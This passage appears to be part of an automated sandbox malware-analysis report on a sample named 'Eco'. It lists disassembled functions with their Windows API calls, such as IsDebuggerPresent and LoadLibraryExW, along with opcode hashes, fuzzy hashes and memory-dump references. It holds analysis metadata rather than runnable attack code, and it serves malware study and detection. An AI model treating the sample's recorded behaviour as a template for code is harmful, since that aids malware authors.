                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          • Opcode ID: 7f034399ab0d1848d73dddd4d523cdfdefcfd3c223b9f20a2fa260dd8b6723ad
                          • Instruction ID: 545383cdf154c7971143414046ac01d8fcbafcf1b0258a9d11bb3d73ec0ca134
                          • Opcode Fuzzy Hash: 7f034399ab0d1848d73dddd4d523cdfdefcfd3c223b9f20a2fa260dd8b6723ad
                          • Instruction Fuzzy Hash: 8371B474500A159FDB249F14E459ABA7FE5FF84364F28C90DEC9D1B282CB31AC41EB91
                          Function 00575FA2 Relevance: 3.1, APIs: 2, Instructions: 142COMMON
                          Download Yara Rule
                          APIs
                          • CharLowerBuffW.USER32(?,?), ref: 00575FBB
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: BuffCharLower
                          • String ID:
                          • API String ID: 2358735015-0
                          • Opcode ID: d73350de067b467e00d5ed97740925a60a73c25cb01af31f697122b750dfb472
                          • Instruction ID: d61b69c02e48d63aa6b6785e9d10986dc457d08b52dcef2d5aa7b8964683c73c
                          • Opcode Fuzzy Hash: d73350de067b467e00d5ed97740925a60a73c25cb01af31f697122b750dfb472
                          • Instruction Fuzzy Hash: 7041D6B250060A9FCB25EF64D8859AEBBB8FF54310F10C52EE51AD7280EB70DE44DB50
                          Function 00525F8B Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                          Download Yara Rule
                          APIs
                          • IsThemeActive.UXTHEME ref: 00525FEF
                            • Part of subcall function 005334CE: __lock.LIBCMT ref: 005334D4
                            • Part of subcall function 005334CE: DecodePointer.KERNEL32(00000001,?,00526004,00568675), ref: 005334E0
                            • Part of subcall function 005334CE: EncodePointer.KERNEL32(?,?,00526004,00568675), ref: 005334EB
                            • Part of subcall function 00525F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00525F18
                            • Part of subcall function 00525F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00525F2D
                            • Part of subcall function 00525240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0052526C
                            • Part of subcall function 00525240: IsDebuggerPresent.KERNEL32 ref: 0052527E
                            • Part of subcall function 00525240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 005252E6
                            • Part of subcall function 00525240: SetCurrentDirectoryW.KERNEL32(?), ref: 00525366
                          • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 0052602F
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                          • String ID:
                          • API String ID: 1438897964-0
                          • Opcode ID: c144176f4bcb08445f2b6a0442be4d4d84ae4269cbe05fb87d91f220f96fb59d
                          • Instruction ID: c2ea8df9ff21e5f410b08ac647310f90aeab12ec1ff90fc4aff0b17d006dc455
                          • Opcode Fuzzy Hash: c144176f4bcb08445f2b6a0442be4d4d84ae4269cbe05fb87d91f220f96fb59d
                          • Instruction Fuzzy Hash: 82118CB19093169BCB21DF69EC4995ABFE8FFA9310F00491FF044872B1EB709549DB92
                          Function 0053574D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: __lock_file_memset
                          • String ID:
                          • API String ID: 26237723-0
                          • Opcode ID: 424ff8522f59e38a6f2f8fe9c6bf2209f5e80746d0cf6be8e76cd1ba332b7533
                          • Instruction ID: 96f804708e527ce2fbaa2ccc8cc8575ab75c07bbd960bfee627b7f5adb5d9fa2
                          • Opcode Fuzzy Hash: 424ff8522f59e38a6f2f8fe9c6bf2209f5e80746d0cf6be8e76cd1ba332b7533
                          • Instruction Fuzzy Hash: A601673180070AEBCF22AF658C0A99E7F71FFC0760F145255F8246B151E7758A61DFA1
                          Function 005354F6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00538C88: __getptd_noexit.LIBCMT ref: 00538C88
                          • __lock_file.LIBCMT ref: 0053553B
                            • Part of subcall function 00536D6E: __lock.LIBCMT ref: 00536D91
                          • __fclose_nolock.LIBCMT ref: 00535546
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                          • String ID:
                          • API String ID: 2800547568-0
                          • Opcode ID: 0d1fcd4b290e23fcb4082677378fb33d91ff68a33e5f8981160c4d9582e66748
                          • Instruction ID: 4c64d3fe876cfaa1abcff13973154393d72c1a994dca833391dfa96c3235cf6e
                          • Opcode Fuzzy Hash: 0d1fcd4b290e23fcb4082677378fb33d91ff68a33e5f8981160c4d9582e66748
                          • Instruction Fuzzy Hash: FAF0B431901B069AEB15AF75D80A76E6FA17F80331F549209F424AB1C1DF7C5E419F91
                          Function 00535DB0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                          Download Yara Rule
                          APIs
                          • __lock_file.LIBCMT ref: 00535DE4
                          • __ftell_nolock.LIBCMT ref: 00535DEF
                            • Part of subcall function 00538C88: __getptd_noexit.LIBCMT ref: 00538C88
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: __ftell_nolock__getptd_noexit__lock_file
                          • String ID:
                          • API String ID: 2999321469-0
                          • Opcode ID: c102c347701cf619442ca78fac45e4f7392178ac5006e0addbce7f941d70c4c1
                          • Instruction ID: ba30a24031e09a360cafac74c5f7402e97f87e3cf8aea090c574c1d023482317
                          • Opcode Fuzzy Hash: c102c347701cf619442ca78fac45e4f7392178ac5006e0addbce7f941d70c4c1
                          • Instruction Fuzzy Hash: EBF0A032901706AAEB10BBB5880B7BE6FA07F80331F505645B020BB1C1DF788F42AA95
                          Function 00525AC3 Relevance: 3.0, APIs: 2, Instructions: 25windowCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00525AEF
                          • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00525B1F
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: IconNotifyShell__memset
                          • String ID:
                          • API String ID: 928536360-0
                          • Opcode ID: 170b0823d2a556bdaaf7003c17990288b075dc8193f1b47f6dedc186e6e0fe14
                          • Instruction ID: 1f842e9ed013f94c4f3f79fbed4d0d423cd1c05d09f2900cf20304bd225b4c79
                          • Opcode Fuzzy Hash: 170b0823d2a556bdaaf7003c17990288b075dc8193f1b47f6dedc186e6e0fe14
                          • Instruction Fuzzy Hash: A6F0A7749053189FDBA2DB24DC4A7957BBCA70130CF0001EBAA0896296D7750B8CCF51
                          Function 00533201 Relevance: 3.0, APIs: 2, Instructions: 7COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • ___crtCorExitProcess.LIBCMT ref: 00533207
                            • Part of subcall function 005331CD: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,0053320C,00530F33,?,00539E1E,000000FF,0000001E,005CB1A8,00000008,00539D82,00530F33,00530F33), ref: 005331DC
                            • Part of subcall function 005331CD: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 005331EE
                          • ExitProcess.KERNEL32 ref: 00533210
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ExitProcess$AddressHandleModuleProc___crt
                          • String ID:
                          • API String ID: 2427264223-0
                          • Opcode ID: f679f9d0c6e6abb1695753a1ce842cde766e67ace9dc5be04276efa2c1401970
                          • Instruction ID: d0380ab47622702385bb128198c8dcd3d68c54420ea16321c8c5672041c9f2d9
                          • Opcode Fuzzy Hash: f679f9d0c6e6abb1695753a1ce842cde766e67ace9dc5be04276efa2c1401970
                          • Instruction Fuzzy Hash: 57B09230000208BBCF012F11DC0A8493F29FB01790F004021F81408072DBB2AA91EAC0
                          Function 0058C11D Relevance: 1.8, APIs: 1, Instructions: 288COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: LoadString$__swprintf
                          • String ID:
                          • API String ID: 207118244-0
                          • Opcode ID: 98c5e3a880b0992952a73a8b598be407bff48ca8ccdcb3c6aa796aaaf3ad4ee1
                          • Instruction ID: 3023e7fc4cdd33aafd7dbd6160e9d0b22b2b123b299d82b7c19cd1ffd421905d
                          • Opcode Fuzzy Hash: 98c5e3a880b0992952a73a8b598be407bff48ca8ccdcb3c6aa796aaaf3ad4ee1
                          • Instruction Fuzzy Hash: 7BB13B74A0010ADFDF14EF94D8959EEBFB5FF98310F14811AF915AB291DB30A942CBA0
                          Function 0051A820 Relevance: 1.7, APIs: 1, Instructions: 193COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3478e6c1d061cc8b8497cfaff76916654cd9ac0ec172c6a779e5271467c0732e
                          • Instruction ID: 606f1efb39058c04edbd063f7f9315e4a5493ee3c2754e92a4e16b0f19e8c729
                          • Opcode Fuzzy Hash: 3478e6c1d061cc8b8497cfaff76916654cd9ac0ec172c6a779e5271467c0732e
                          • Instruction Fuzzy Hash: 1761BD70600206AFEB11DF50C895ABABBE5FF85310F14842DE8169B292E775EDC5CB52
                          Function 0052343F Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          • Opcode ID: 2c0cf660d0e4f10e96f5a51a60e5a6f37166e2a5cc8993c5eec2e05e3ccb1bf4
                          • Instruction ID: 83f615620271fd2bbff1bd46fbc212a34eecec237b9fd3d18ac1a9ce5b52811b
                          • Opcode Fuzzy Hash: 2c0cf660d0e4f10e96f5a51a60e5a6f37166e2a5cc8993c5eec2e05e3ccb1bf4
                          • Instruction Fuzzy Hash: D031A375604622DFCB29EF18E494921FBA0FF4A310B54C5AAE98A8B7D1E734DD41CB90
                          Function 0058DAFA Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _free
                          • String ID:
                          • API String ID: 269201875-0
                          • Opcode ID: cbb8f84f6d53d993f6c1a88686835b8c004d170cd5a5e81f1e90ef8d4827b171
                          • Instruction ID: 91fc8aeec1bca77e3ebfaa98b0ac2efa2e72f7753b050e1b08215a0c8bf8412a
                          • Opcode Fuzzy Hash: cbb8f84f6d53d993f6c1a88686835b8c004d170cd5a5e81f1e90ef8d4827b171
                          • Instruction Fuzzy Hash: 13316A71504625DFCF00AF04D0956A9BFF1FF8A321F218889ED9A6B381CB70A945CFA1
                          Function 0054E20F Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ClearVariant
                          • String ID:
                          • API String ID: 1473721057-0
                          • Opcode ID: edaa231b22058c71148ce0ab0e884afd990cacf1c1c0369b01505c33620040aa
                          • Instruction ID: b25df905cd3bcb7d543de22eb8c62fdf397e73d58fc1d7a3ac6b0a9c98b7213c
                          • Opcode Fuzzy Hash: edaa231b22058c71148ce0ab0e884afd990cacf1c1c0369b01505c33620040aa
                          • Instruction Fuzzy Hash: D841E974508351DFEB15DF14C458B9ABBE1BF85308F0988ACE8995B362C375EC85CB52
                          Function 005249C2 Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00524B29: FreeLibrary.KERNEL32(00000000,?), ref: 00524B63
                            • Part of subcall function 005353AB: __wfsopen.LIBCMT ref: 005353B6
                          • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,005227AF,?,00000001), ref: 005249F4
                            • Part of subcall function 00524ADE: FreeLibrary.KERNEL32(00000000), ref: 00524B18
                            • Part of subcall function 005248B0: _memmove.LIBCMT ref: 005248FA
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Library$Free$Load__wfsopen_memmove
                          • String ID:
                          • API String ID: 1396898556-0
                          • Opcode ID: ae37f1bc0a22b4feddf88e4d3b9479074e1ae89331a9a8ed336b9764be2f0a84
                          • Instruction ID: 75b549094e0bef49a229c6c6ac4125a935670f54f4d321f7d149112734639462
                          • Opcode Fuzzy Hash: ae37f1bc0a22b4feddf88e4d3b9479074e1ae89331a9a8ed336b9764be2f0a84
                          • Instruction Fuzzy Hash: BE11C831650626ABCF14EB70EC1AB6E7BA6BF81701F10442DF541A71C1EB709A01AF94
                          Function 00521BCC Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          • Opcode ID: 318c5f7c7d7cd3286f291ec0607ef5a37b780457557490e7402b534527efcf7f
                          • Instruction ID: 1ec6b2631f1028c1bd4c18c2db6915ae0c2fd2f37da1bff5cc84c1278868865c
                          • Opcode Fuzzy Hash: 318c5f7c7d7cd3286f291ec0607ef5a37b780457557490e7402b534527efcf7f
                          • Instruction Fuzzy Hash: 34114C76604B01DFC724CF28E481916BBF9FF49310B20882EE48ACB2A1E732E841CF54
                          Function 0054E2F2 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ClearVariant
                          • String ID:
                          • API String ID: 1473721057-0
                          • Opcode ID: 2a590e5762171525bedf6b4b13435a70ba95dc5a73ed601039c942730dbba523
                          • Instruction ID: 7f080e287351c2b2a0e453b1a93b932b261a73df582005ead9e559f464d8d1bb
                          • Opcode Fuzzy Hash: 2a590e5762171525bedf6b4b13435a70ba95dc5a73ed601039c942730dbba523
                          • Instruction Fuzzy Hash: 43210574508301DFDB25DF54C458B9ABBE1BF89304F05896CF88A57362D731E889DB92
                          Function 00521A36 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          • Opcode ID: 74da934b7bf074180758811dbad9ff6e3ea80466ae56d315e44f0c1284b13edb
                          • Instruction ID: 3f8ad992f1890965d1760a719ffada18fc43101a6e88b5cc88b95968b42b0420
                          • Opcode Fuzzy Hash: 74da934b7bf074180758811dbad9ff6e3ea80466ae56d315e44f0c1284b13edb
                          • Instruction Fuzzy Hash: 2001DB722017126ED3245B28DC06A677FA8BF447A0F10892DF51ACA1D1DB71E4408B94
                          Function 0058473F Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                          Download Yara Rule
                          APIs
                          • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 0058477C
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: EnvironmentVariable
                          • String ID:
                          • API String ID: 1431749950-0
                          • Opcode ID: 16401c42dbe79971c3bca48643a4778736c3e485acfb063488b4665befb673bd
                          • Instruction ID: 968963db98b3837e8e7490a60a109de3fa03262ba25ad2803524c5d66c041f06
                          • Opcode Fuzzy Hash: 16401c42dbe79971c3bca48643a4778736c3e485acfb063488b4665befb673bd
                          • Instruction Fuzzy Hash: 85F036356082056F9B15FB55D84AC9F7FB8FF95320B004156F40597291DF70A941DBA1
                          Function 00577AEC Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00530F16: std::exception::exception.LIBCMT ref: 00530F4C
                            • Part of subcall function 00530F16: __CxxThrowException@8.LIBCMT ref: 00530F61
                          • _memset.LIBCMT ref: 00577B21
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
